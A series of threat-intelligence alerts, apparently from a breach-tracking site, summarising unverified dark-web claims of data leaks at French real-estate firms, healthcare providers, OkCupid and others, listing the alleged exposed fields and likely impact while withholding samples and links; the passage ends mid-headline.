389K People From French Valuation Firm Jestimo A threat actor using the alias **ChimeraZ** claims to have leaked the database of **Jestimo** (jestimo.com), a French real-estate valuation platform used by estate agents and rental managers. The post advertises **168,706 records covering about 389,365 people**, roughly **285 MB** of JSON, including agent and contact names, email addresses, phone numbers, property addresses, and valuation estimates. This is the latest in a run of French real-estate data leaks by the same actor this week. The claim is **unverified** and Jestimo has not publicly addressed it. Severity HIGH Data389K people PriceFree leak Country![France flag](https://flagcdn.com/w40/fr.png)France ActorChimeraZ ### ▣Post details TargetJestimo (jestimo.com), real-estate valuation Country![France flag](https://flagcdn.com/w40/fr.png)France SectorReal Estate (valuation software) ClaimCustomer / valuation database leaked Data168,706 records, \~389,365 people (285 MB) ObservedJun 11, 2026 PriceFree leak (reply-gated) ActorChimeraZ ### !Allegedly exposed - 389,365 people / 168,706 records (claimed) - Agent & contact names - Email addresses - Phone numbers - Property addresses - Valuation / estimation amounts - Estate-agency details - Valuation report contents ### ◱Screenshot [ ![Jestimo France alleged data leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/237895687926349867235987623948762.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/237895687926349867235987623948762.png) ### ⚠Potential impact If genuine, a dataset of roughly **389,000 people** tied to property addresses, valuation amounts, and agent and client contact details would be a useful resource for targeted real-estate scams, phishing of agents and property owners, and profiling of higher-value properties. The valuation figures and ownership context make fraudulent approaches more convincing. Most of the data is contact and property information rather than financial accounts or credentials, but the scale and targeting value are significant. Figures and authenticity are unconfirmed. ### iStatus Unverified Sample records and a file summary were posted to an underground forum, with downloads behind a reply gate; the sample records, contact details, and download links are not reproduced here. The claim has **not been independently confirmed** and Jestimo has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Alleged Capifrance Leak Exposes Data on 786,000 People URL: https://darkwebinformer.com/alleged-capifrance-leak-exposes-data-on-786-000-people/ Last updated: 2026-06-10T17:25:10.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Real Estate ## Alleged Capifrance Leak Exposes Data on 786,000 People A threat actor using the alias **ChimeraZ** claims to be leaking a **partial database** of **Capifrance** (capifrance.fr), a French network of independent real-estate agents. The post advertises **3.59 million records covering about 785,000 people**, roughly **3.0 GB** of JSON spanning contacts, property deals, transactions, and mandate signatures. The contact records reportedly include dates of birth, addresses, emails, phone numbers, nationality, marital status, and profession. This is the same actor behind the recent Leboncoin Immobilier and Proprietes-Privees leaks, part of an announced run of French real-estate breaches. The claim is **unverified** and Capifrance has not publicly addressed it. Severity HIGH Data3.6M records / 786K people Price3 forum points Country![France flag](https://flagcdn.com/w40/fr.png)France ActorChimeraZ ### ▣Post details TargetCapifrance (capifrance.fr) Country![France flag](https://flagcdn.com/w40/fr.png)France SectorReal Estate ClaimPartial database leaked Data3.6M records, \~786K people (3.0 GB) ObservedJun 10, 2026 Price3 forum points (paywall) ActorChimeraZ ### !Allegedly exposed - 3.6M records / 786K people (claimed) - Names & dates of birth - Postal addresses - Emails & phone numbers - Nationality & marital status - Profession & civil-status fields - Property deals & transactions - Mandate signatures & agent data ### ◱Screenshot [ ![Capifrance France alleged data breach Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/82378956293876598273649876523.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/82378956293876598273649876523.png) ### ⚠Potential impact If genuine, a partial database covering around **785,000 people** with names, dates of birth, addresses, contact details, nationality, marital status, and profession would be a strong basis for identity theft, phishing, and targeted scams, especially against property buyers and sellers. The deal, transaction, and signature records add financial and behavioural context that makes fraud more convincing. The contact records also flag whether identity documents were held on file, hinting at deeper data in the wider breach. This is part of a continuing series of French real-estate leaks by the same actor. Figures and authenticity are unconfirmed. ### iStatus Unverified Per-file samples and record counts were posted to an underground forum, with the data behind a small points paywall; the sample records and download links are not reproduced here. The claim has **not been independently confirmed** and Capifrance has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Hacker Claims to Deface Telcel Business-Tracking Platform and Alter Admin Accounts URL: https://darkwebinformer.com/hacker-claims-to-deface-telcel-business-tracking-platform-and-alter-admin-accounts/ Last updated: 2026-06-10T17:12:57.000Z Breach Report ![Mexico flag](https://flagcdn.com/w40/mx.png)Mexico Telecom ## Hacker Claims to Deface Telcel Business-Tracking Platform and Alter Admin Accounts A threat actor using the alias **azazeljakel** (posting under the tag "CORTEX") claims to have compromised **Localizacion Empresarial Telcel (LET)**, a business location and fleet-tracking platform operated under the Mexican telecom brand **Telcel** (let.telcel.com). Rather than dumping data, the actor says they accessed the site and **altered its administrator accounts**, posting screenshots of the admin panel tagged with their handle as proof. There is no sign of a published dataset, but admin access to a live asset-tracking system is a meaningful security concern. The claim is **unverified** and Telcel has not publicly addressed it. Severity MEDIUM ImpactAdmin takeover TypeDefacement Country![Mexico flag](https://flagcdn.com/w40/mx.png)Mexico Actorazazeljakel ### ▣Post details TargetLocalizacion Empresarial Telcel (let.telcel.com) Country![Mexico flag](https://flagcdn.com/w40/mx.png)Mexico SectorTelecommunications ClaimSite compromise, admin accounts altered IncidentDefacement / unauthorized admin access ObservedJun 10, 2026 Data dumpNone published (so far) Actorazazeljakel (CORTEX) ### !What is claimed - Admin-panel access (claimed) - Administrator accounts altered - Website defacement (with proof) - Business GPS / fleet-tracking system - Possible business location data at risk - Telcel-branded platform (let.telcel.com) - No dataset published so far - Proof-of-access screenshots posted ### ◱Screenshot [ ![Telcel LET Mexico alleged website defacement Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/23578962349876234987632598769872134.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/23578962349876234987632598769872134.png) ### ⚠Potential impact If genuine, gaining administrator access to a **fleet and asset-tracking platform** is concerning even without a published dataset: such systems hold the real-time and historical locations of business vehicles and assets, and admin control could expose that tracking data or allow records to be tampered with. The actor frames this as a defacement, replacing administrator credentials and tagging the panel, rather than a data theft, and the account is low-reputation, so the practical impact may be limited to the affected sub-service. Even so, any administrative compromise of a Telcel-branded system warrants attention. The claim is unverified. ### iStatus Unverified The actor posted defacement screenshots and a list of altered administrator accounts to a forum, alongside a Telegram channel; the specific admin usernames, the altered credentials, and the channel link are not reproduced here. The claim has **not been independently confirmed** and Telcel has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Hacker Claims to Sell 533GB of French and European Healthcare Data and Access URL: https://darkwebinformer.com/hacker-claims-to-sell-533gb-of-french-and-european-healthcare-data-and-access/ Last updated: 2026-06-10T16:35:51.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France / EU Healthcare ## Hacker Claims to Sell 533GB of French and European Healthcare Data and Access A threat actor using the alias **Zab26** is advertising for sale what they describe as a **533 GB "full-stack" healthcare dataset** spanning French and European health systems. The listing claims **1.16 million files**, including over **534,000 protected-health-information documents**, **479,877 Social Security numbers**, more than **115 million database rows**, source code, private keys and TLS certificates, and, most alarmingly, claimed **live access** to health systems, including a query interface to France's **DMP (Dossier Medical Partage)** shared medical-record platform, Kubernetes clusters, Slack, and mail. The claim is **unverified**. Severity CRITICAL Data533 GB / 115M rows PriceFor sale Country![France flag](https://flagcdn.com/w40/fr.png)France / EU ActorZab26 ### ▣Post details TargetFrench / European healthcare systems (multiple) Country![France flag](https://flagcdn.com/w40/fr.png)France / EU SectorHealthcare ClaimHealthcare data + live access for sale Data533 GB, 1.16M files, 115M+ rows ObservedJun 9, 2026 PriceFor sale (full only, PoF required) ActorZab26 ### !Allegedly exposed - 533 GB / 1.16M files (claimed) - 115M+ database rows - 534,697 PHI / medical documents - 479,877 Social Security numbers - Patient & health-record identifiers - Credentials, tokens & password data - Private keys & TLS certificates - Claimed live system & DMP access ### ◱Screenshot [ ![France European healthcare alleged data breach Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/273895623768498273649872369872.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/273895623768498273649872369872.png) ### ⚠Potential impact If even partly genuine, this would be one of the most serious healthcare exposures imaginable: hundreds of thousands of **medical and identity documents**, nearly **480,000 Social Security numbers**, consultation and vaccination records, and over 115 million rows of personal data tied to French and European health systems. The seller also claims **live operational access**, including a query path to France's national **DMP** medical-record platform, plus Kubernetes clusters, mail, and Slack, which, if real, would mean an active, ongoing compromise rather than a static leak. The presence of private keys and TLS certificates raises the risk of impersonation and deeper intrusion. These claims are extraordinary and entirely unverified, and sweeping "everything" listings are sometimes exaggerated or stitched together from multiple sources. ### iStatus Unverified The dataset and access are advertised for sale on an underground forum, with samples gated behind a password and contact via XMPP or the forum; the sample data, credentials, contact identifiers, and any specific system details are not reproduced here. Given the extraordinary scope, the claim warrants particular caution. It has **not been independently confirmed**, and no affected organisation has publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### H1 Data Breach: 2M+ Medical Professional Records Leaked URL: https://darkwebinformer.com/h1-co-data-breach-2m-medical-professional-records-leaked/ Last updated: 2026-06-10T16:27:26.000Z Breach Report ![United States flag](https://flagcdn.com/w40/us.png)United States Healthcare ## H1.co Data Breach: 2M+ Medical Professional Records Leaked A threat actor using the alias **Soral** claims to have breached **H1** (h1.co), a global healthcare technology and data-analytics company. The post advertises a dataset of **2,064,071 medical professionals**, reportedly including IDs, full names, civility, sex, country, specialties, diploma and license names, years of experience, and photos. The sample records are largely French healthcare practitioners drawn from professional registry data. No patient data, contact details, or credentials appear in the listed fields. The claim is **unverified** and H1 has not publicly addressed it. Severity MEDIUM Data2M+ professionals PriceFree leak Country![United States flag](https://flagcdn.com/w40/us.png)United States ActorSoral ### ▣Post details TargetH1 (h1.co), healthcare data analytics Country![United States flag](https://flagcdn.com/w40/us.png)United States SectorHealthcare Tech / Data Analytics ClaimMedical-professional database breached Data2,064,071 professional records ObservedJun 10, 2026 PriceFree leak (reply-gated) ActorSoral (GOD user) ### !Allegedly exposed - 2,064,071 professional records (claimed) - Full names & civility - Sex & country - Medical specialties - Diploma & license names - Years of experience - Workplace names & sector - Profile photos ### ◱Screenshot [ ![H1.co alleged data breach Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/3287654897239876253987623987465987623.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/3287654897239876253987623987465987623.png) ### ⚠Potential impact If genuine, a directory of **2 million+ medical professionals** with names, specialties, qualifications, workplaces, and photos would be a useful targeting resource for phishing and impersonation aimed at the healthcare sector. The per-record sensitivity is lower than a patient or consumer breach: the listed fields are professional and contain no patient data, contact details, or credentials, and much of the data appears derived from public professional registries (such as France's RPPS). The main risk comes from scale and aggregation rather than individually secret information. Figures and authenticity are unconfirmed. ### iStatus Unverified Sample records and field listings were posted to an underground forum, with the full dataset behind a reply gate; the sample records and download links are not reproduced here. The claim has **not been independently confirmed** and H1 has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Proprietes-Privees Data Breach: 3.2M Records on 2.5M People Leaked URL: https://darkwebinformer.com/proprietes-privees-data-breach-3-2m-records-on-2-5m-people-leaked/ Last updated: 2026-06-09T16:21:34.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Real Estate ## Proprietes-Privees Data Breach: 3.2M Records on 2.5M People Leaked A threat actor using the alias **ChimeraZ** claims to have breached **Proprietes-Privees.com**, a French real-estate network operating through independent property consultants. The actor says a simple API request let them retrieve admin-mailbox credentials and extract a **2.65 GB** database, advertised at **3.28 million records covering about 2.53 million people**. Notably, the actor names Proprietes-Privees as the source behind the recently leaked "Leboncoin Immobilier" listings. The exposed data reportedly includes financial profiles, contact details, agent accounts with passwords, and payment records. The claim is **unverified**. Severity CRITICAL Data3.2M records / 2.5M people Price3 forum points Country![France flag](https://flagcdn.com/w40/fr.png)France ActorChimeraZ ### ▣Post details TargetProprietes-Privees.com (real-estate network) Country![France flag](https://flagcdn.com/w40/fr.png)France SectorReal Estate ClaimDatabase extracted via API / admin-credential abuse Data3.28M records, \~2.53M people (2.65 GB) ObservedJun 9, 2026 Price3 forum points (paywall) ActorChimeraZ ### !Allegedly exposed - 3.2M records / 2.5M people (claimed) - Names, emails & phone numbers - Postal addresses - Financial profiles (income, savings, tax) - Property mandates & valuations - 9K+ agent accounts with passwords - Payment / transaction records - Appointment & activity history ### ◱Screenshots [ ![Proprietes-Privees France alleged data breach Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/587092093857098647309872309823.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/587092093857098647309872309823.png) [ ![Proprietes-Privees France alleged data breach Screenshot 2](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/587092093857098647309872309824.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/587092093857098647309872309824.png) ### ⚠Potential impact If genuine, this is a severe, multi-layered breach: around **2.5 million people** with contact details and, for many, detailed **financial profiles** (income, savings, taxes, and wealth indicators), plus property mandates and valuations. Most damaging are the roughly **9,000 agent accounts said to include plaintext passwords** (some with admin and email access) and a set of **payment transaction records**, which together enable account takeover, fraud, and highly targeted scams against wealthy property clients. The actor also frames Proprietes-Privees as the upstream source of the earlier "Leboncoin Immobilier" leak and of further breaches to come. Figures and authenticity are unconfirmed. ### iStatus Unverified Per-file breakdowns and samples were posted to an underground forum, with downloads behind a small points paywall; the sample records, credentials, payment data, and download links are not reproduced here. The actor also claimed to hold internal media files, which we have not verified and do not detail. The claim has **not been independently confirmed** and Proprietes-Privees has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Ochre Health Data Breach: 25K+ Patients' Medical Records for Sale URL: https://darkwebinformer.com/ochre-health-data-breach-25k-patients-medical-records-for-sale/ Last updated: 2026-06-09T15:21:10.000Z Breach Report ![Australia flag](https://flagcdn.com/w40/au.png)Australia Healthcare ## Ochre Health Data Breach: 25K+ Patients' Medical Records for Sale A threat actor using the alias **2019** claims to be selling a patient database stolen from **Ochre Health**, an Australian medical-centre network providing general practice and allied health services. The post advertises **25,000+ patients and 700,000+ records** with highly sensitive medical and identity data, including names, dates of birth, contact details, **Medicare and DVA numbers**, appointment histories, and payment information. It is offered as a one-time sale in cryptocurrency. The claim is **unverified** and Ochre Health has not publicly addressed it. Severity CRITICAL Data25K patients / 700K records PriceOne-time sale (crypto) Country![Australia flag](https://flagcdn.com/w40/au.png)Australia Actor2019 ### ▣Post details TargetOchre Health (medical-centre network) Country![Australia flag](https://flagcdn.com/w40/au.png)Australia SectorHealthcare ClaimPatient database offered for sale Data25K+ patients, 700K+ records (medical) ObservedJun 9, 2026 PriceOne-time sale (BTC/ETH/XMR) Actor2019 (GOD user) ### !Allegedly exposed - 25K+ patients / 700K+ records (claimed) - Patient names & dates of birth - Mobile, home phone & email - Home address, suburb & postcode - Medicare numbers, refs & expiry - DVA (veterans' affairs) numbers - Appointment & treating-doctor details - Payment & billing information ### ◱Screenshot [ ![Ochre Health Australia alleged data leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/57628387962358975626398766489723987.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/57628387962358975626398766489723987.png) ### ⚠Potential impact If genuine, this is an especially serious exposure: a healthcare dataset linking **25,000+ patients** to dates of birth, contact details, **Medicare and DVA numbers**, appointment histories, and treating doctors. Medicare and DVA numbers are sensitive Australian health identifiers that can enable Medicare fraud, identity theft, and highly convincing medical-themed scams, and the health context itself makes any exposure particularly harmful to patients. Health data is among the most damaging information to leak. Record counts and authenticity are unconfirmed. ### iStatus Unverified Column listings across three tables and sample patient records were posted to an underground forum, offered as a one-time cryptocurrency sale via Session and TOX contacts; the sample records and contact identifiers are not reproduced here. The claim has **not been independently confirmed** and Ochre Health has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Zeemart Data Breach: 510K+ Records Leaked From Singapore F&B Platform URL: https://darkwebinformer.com/zeemart-data-breach-510k-records-leaked-from-singapore-f-b-platform/ Last updated: 2026-06-09T15:13:42.000Z Breach Report ![Singapore flag](https://flagcdn.com/w40/sg.png)Singapore Technology ## Zeemart Data Breach: 510K+ Records Leaked From Singapore F&B Platform A threat actor using the alias **2019** claims to have leaked the database of **Zeemart**, a Singapore-based B2B procurement and supply-chain platform for restaurants, cafes, and other food and beverage businesses. The post advertises **510,000+ records** across user, company, outlet, and order tables, including names, emails, phone and WhatsApp numbers, business details, addresses, and order and financial data. The dataset is shared via a free download. The claim is **unverified** and Zeemart has not publicly addressed it. Severity HIGH Data510K+ records PriceFree leak Country![Singapore flag](https://flagcdn.com/w40/sg.png)Singapore Actor2019 ### ▣Post details TargetZeemart (B2B F&B procurement platform) Country![Singapore flag](https://flagcdn.com/w40/sg.png)Singapore SectorB2B Procurement / SaaS ClaimPlatform database leaked (4 tables) Data510K+ records (users, companies, outlets, orders) ObservedJun 9, 2026 PriceFree leak Actor2019 (GOD user) ### !Allegedly exposed - 510,000+ records (claimed) - User names, titles & roles - Email addresses - Phone & WhatsApp numbers - Company & outlet details - Business addresses & postal codes - Order data (amounts, GST, totals) - Subscription & account metadata ### ◱Screenshot [ ![Zeemart Singapore alleged data leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/32578923597862359872359876987235.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/32578923597862359872359876987235.png) ### ⚠Potential impact If genuine, a B2B dataset of **510,000+ records** linking named restaurant and supplier staff to emails, phone and WhatsApp numbers, company and outlet details, and order and financial data would be valuable for business email compromise (BEC), invoice fraud, phishing, and competitor intelligence across Singapore's food and beverage sector. The order amounts and supplier relationships make targeted fraud against specific businesses more convincing. Record counts and authenticity are unconfirmed. ### iStatus Unverified A column listing across four tables and sample records were posted to an underground forum, with a free download link; the sample records and download link are not reproduced here. The claim has **not been independently confirmed** and Zeemart has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Napoleon Perdis Data Breach: 339K Australian Customer Records Leaked URL: https://darkwebinformer.com/napoleon-perdis-data-breach-339k-australian-customer-records-leaked/ Last updated: 2026-06-09T15:02:27.000Z Breach Report ![Australia flag](https://flagcdn.com/w40/au.png)Australia Retail ## Napoleon Perdis Data Breach: 339K Australian Customer Records Leaked A threat actor using the alias **2019** claims to have leaked the customer database of **Napoleon Perdis**, the Australian luxury cosmetics brand. The post advertises **over 339,000 customer records** including names, emails, phone and mobile numbers, postal and delivery addresses, and loyalty and total-spend data. The dataset is shared behind a reply gate on an underground forum. The claim is **unverified** and Napoleon Perdis has not publicly addressed it. Severity HIGH Data339K+ customers PriceFree leak Country![Australia flag](https://flagcdn.com/w40/au.png)Australia Actor2019 ### ▣Post details TargetNapoleon Perdis (luxury cosmetics brand) Country![Australia flag](https://flagcdn.com/w40/au.png)Australia SectorRetail / Cosmetics ClaimCustomer database leaked Data339,100+ customer records ObservedJun 9, 2026 PriceFree leak (reply-gated) Actor2019 (GOD user) ### !Allegedly exposed - 339,100+ customer records (claimed) - Full names (and company names) - Email addresses - Phone, mobile & fax numbers - Postal & delivery addresses - Loyalty points & dollar balances - Total spend & transaction history - Customer IDs & account metadata ### ◱Screenshot [ ![Napoleon Perdis Australia alleged data leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/72835798623597862359687239587623.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/72835798623597862359687239587623.png) ### ⚠Potential impact If genuine, a database of **339,000+ customers** with names, emails, phone numbers, and home and delivery addresses, paired with loyalty and total-spend data, would be valuable for phishing, scams, and the targeting of higher-spending customers. The spend and loyalty fields make it easier for attackers to single out the most valuable individuals. There is no indication of payment-card data or passwords in the listed fields, but the contact and address exposure alone is significant. Record counts and authenticity are unconfirmed. ### iStatus Unverified A column listing and sample records were posted to an underground forum, with downloads behind a reply gate; the sample records and download links are not reproduced here. The claim has **not been independently confirmed** and Napoleon Perdis has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Leboncoin Immobilier Data Leak: 4M French Property Listings Exposed URL: https://darkwebinformer.com/leboncoin-immobilier-data-leak-4m-french-property-listings-exposed/ Last updated: 2026-06-08T17:11:27.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Real Estate ## Leboncoin Immobilier Data Leak: 4M French Property Listings Exposed A threat actor using the alias **ChimeraZ** claims to be leaking a **4 million-listing** real-estate dataset branded "**Leboncoin Immobilier**," aggregated from 13 French property portals including Leboncoin, SeLoger, and PAP. The data reportedly totals about **4.38 GB** of JSON with roughly **1.1 million phone numbers**, listing details, and seller contact information. The actor hints the underlying compromise comes from an upstream third party (to be revealed), so this may not be a direct breach of Leboncoin. The claim is **unverified**. Severity HIGH Data4M+ listings Price4 forum points Country![France flag](https://flagcdn.com/w40/fr.png)France ActorChimeraZ ### ▣Post details TargetLeboncoin Immobilier (aggregated real-estate listings) Country![France flag](https://flagcdn.com/w40/fr.png)France SectorReal Estate / Classifieds ClaimAggregated listing dataset leaked (source teased) Data\~4M listings (13 portals); 1.1M phone numbers ObservedJun 8, 2026 Price4 forum points (paywall) ActorChimeraZ ### !Allegedly exposed - \~4M property listings (claimed) - 1.1M+ phone numbers - Seller / lister names - Listing prices & property details - Postal codes & listing locations - Ad URLs & references - Data from 13 French property portals - Listing photo / media links ### ◱Screenshot [ ![Leboncoin Immobilier France alleged data leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/2347958697862359872634987623978623.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/2347958697862359872634987623978623.png) ### ⚠Potential impact If genuine, an aggregated set of **4 million listings** with around **1.1 million phone numbers**, seller names, property values, and locations would be a strong resource for spam, vishing, and property-related scams targeting both sellers and buyers across France. Much of the listing content is public ad data, but the bulk phone-and-name aggregation is the sensitive part. Because the actor frames the source as an upstream third party, the true compromised entity may differ from the portals named, and the figures are unconfirmed. ### iStatus Unverified A data sample and per-site line counts were posted to an underground forum, with downloads behind a small points paywall; the sample records, seller contact details, and download links are not reproduced here. The actor teased that the source of the compromise would be revealed later. The claim has **not been independently confirmed**, and the named portals have not addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### OkCupid Data Scrape: Hacker Claims to Sell 35M User Records URL: https://darkwebinformer.com/okcupid-data-scrape-hacker-claims-to-sell-35m-user-records/ Last updated: 2026-06-08T16:45:28.000Z Breach Report ![United States flag](https://flagcdn.com/w40/us.png)United States Dating ## OkCupid Data Scrape: Hacker Claims to Sell 35M User Records A threat actor using the alias **authentic** claims to be selling a database of **35 million OkCupid users**, saying it was scraped after gaining privileged access to the dating app's **internal API**. The advertised data is highly sensitive, reportedly including names, emails, phone numbers, **hashed passwords**, dates of birth, precise location, sexual orientation, and dating preferences, with Telegram and Session contacts for buyers. The claim is **unverified** and OkCupid has not publicly addressed it. Severity CRITICAL Data35M users PriceTelegram sale Country![United States flag](https://flagcdn.com/w40/us.png)United States Actorauthentic ### ▣Post details TargetOkCupid (dating app) Country![United States flag](https://flagcdn.com/w40/us.png)United States SectorOnline Dating / Social ClaimUser database scraped via internal API, for sale Data35,000,000 user profiles ObservedJun 5, 2026 PriceTelegram sale Actorauthentic (VIP) ### !Allegedly exposed - 35M user profiles (claimed) - Names, usernames & emails - Phone numbers - Hashed passwords - Dates of birth & age - Gender, pronouns & sexual orientation - Precise location (city, GPS coords) - Dating prefs, signup IP & billing tier ### ◱Screenshot [ ![OkCupid alleged data leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/823578962387469872354875124987124.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/823578962387469872354875124987124.png) ### ⚠Potential impact If genuine, a 35 million-user dating database would be among the most dangerous exposures possible: it links real identities to **sexual orientation, precise location, dates of birth, and intimate dating preferences**, alongside emails, phone numbers, and hashed passwords. That combination enables targeted harassment, sextortion, doxxing, stalking, and identity theft, and is especially dangerous for users in places where sexual orientation can carry legal or physical risk. The scale and authenticity are unconfirmed, and "internal API scraping" claims should be treated with caution. ### iStatus Unverified A column listing and sample records were posted to an underground forum, with Telegram and Session contacts for buyers; the sample records and contact identifiers are not reproduced here. The claim has **not been independently confirmed** and OkCupid has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Tayara Data Breach: Hacker Claims 2M+ Tunisian User Records for Sale URL: https://darkwebinformer.com/tayara-data-breach-hacker-claims-2m-tunisian-user-records-for-sale/ Last updated: 2026-06-08T16:33:03.000Z Breach Report ![Tunisia flag](https://flagcdn.com/w40/tn.png)Tunisia Classifieds ## Tayara Data Breach: Hacker Claims 2M+ Tunisian User Records for 